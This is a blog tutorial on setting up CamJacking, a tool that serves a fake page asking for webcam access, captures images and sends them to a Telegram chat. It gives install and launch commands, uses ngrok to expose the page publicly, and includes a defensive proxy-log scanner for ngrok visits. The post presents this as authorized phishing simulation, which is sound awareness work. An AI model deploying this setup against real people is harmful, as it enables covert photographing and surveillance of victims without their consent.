How to Use CamJacking for Ethical Social Engineering Simulations

In this blog, we'll explore CamJacking, a powerful open-source tool used to simulate webcam-based phishing attacks. Developed for ethical hackers and red teamers, this tool helps test how users respond to camera permission prompts.

What is CamJacking?

CamJacking creates a fake webpage that asks for webcam access. When the user clicks "Allow", the tool captures images via the webcam and sends them to a Telegram chat. This is useful for demonstrating how easily users can be tricked into giving up camera access during phishing attacks.

Step 1: Install CamJacking

CamJacking is available as an npm package. Install it globally using:


    sudo npm install camjacking -g

Step 2: Set Up Telegram Bot

CamJacking sends captured images to Telegram. To set this up:

  • 💬 Open Telegram and search for @CappricioSecuritiesTools_bot
  • ▶️ Click "Start"
  • 📥 Note down your Chat ID (visible in the bot reply)

Step 3: Add Your Telegram Chat ID

Before starting CamJacking, make sure you have your Telegram Chat ID ready. Replace <your_telegram_chat_id> in the command below with your actual ID.


    camjacking -c <your_telegram_chat_id>

Step 4: Start CamJacking


    camjacking -p 80

Now run the command above in your terminal. This will start the CamJacking server locally on port 80.

Step 5: Access the Fake Page

Once CamJacking is running, open http://localhost:80 in your browser. The page will request camera access.

Step 6: Make It Public (Optional)

Use ngrok to expose the page to the internet:


    ngrok http 80

Share the generated link to test it on other devices.
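For the team monitoring an authorized exercise, visits to the ngrok link show up in egress proxy logs. The following is an added example (not part of CamJacking or the original post) that scans proxy-log lines for ngrok tunnel hosts and lists the users who reached them; the log format, function names, suffix list and sample lines are assumptions constructed for illustration.

```javascript
// Added example: flag proxy-log entries that reach ngrok tunnel hosts.
// Assumed log format (constructed): "<time> <user> <method> <target> <status>"
// Suffix list is an assumption; adjust it to the domains seen in your environment.
const TUNNEL_SUFFIXES = ['ngrok.io', 'ngrok.app', 'ngrok-free.app'];

// Extract the hostname from "CONNECT host:443" (HTTPS) or "GET http://host/path".
function hostOf(method, target) {
  if (method === 'CONNECT') return target.split(':')[0].toLowerCase();
  try { return new URL(target).hostname.toLowerCase(); } catch { return null; }
}

// Match on a label boundary so "ngrok.io.example.com" and "notngrok.io" do not hit.
function isTunnelHost(host) {
  return TUNNEL_SUFFIXES.some(s => host === s || host.endsWith('.' + s));
}

// Returns one record per matching line: { time, user, host }.
function findTunnelVisits(lines) {
  const hits = [];
  for (const line of lines) {
    const [time, user, method, target] = line.trim().split(/\s+/);
    if (!target) continue; // skip blank or malformed lines
    const host = hostOf(method, target);
    if (host && isTunnelHost(host)) hits.push({ time, user, host });
  }
  return hits;
}

// Distinct users who reached a tunnel host, for the exercise report.
function usersWhoVisited(hits) {
  return [...new Set(hits.map(h => h.user))].sort();
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '2024-05-01T09:14:02Z alice CONNECT a1b2c3d4.ngrok-free.app:443 200',
  '2024-05-01T09:14:09Z bob GET http://intranet.example.com/home 200',
  '2024-05-01T09:15:40Z carol GET https://ngrok.io.example.com/login 200',
  '2024-05-01T09:16:11Z bob GET https://e5f6.ngrok.io/ 200',
  'garbage-line',
];

console.log(usersWhoVisited(findTunnelVisits(SAMPLE_LOG)));
```

A proxy log only shows that the page was reached, not whether the user clicked "Allow" on the camera prompt.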

Real-World Use Cases

  • 👨‍🏫 Security Awareness Training: Show employees how easy it is to get tricked into sharing webcam access.
  • 🧪 Phishing Simulations: Emulate a real-world camera phishing scenario.
  • Red Team Exercises: Capture user behavior when presented with permission prompts.

Legal Disclaimer

โš ๏ธ Use CamJacking only in authorized environments. This tool is meant for educational and ethical hacking purposes. Unauthorized use may be illegal.

GitHub Repository

You can find the official code and updates on:

Cappricio-Securities/camjacking

Conclusion

CamJacking is a simple yet powerful tool to demonstrate how easily trust can be exploited. It's a great resource for red teamers, trainers, and security enthusiasts looking to raise awareness about camera-based phishing attacks.

Thanks for reading! If you found this useful, feel free to share it with your fellow hackers. Stay safe and think before you click! 💻🔒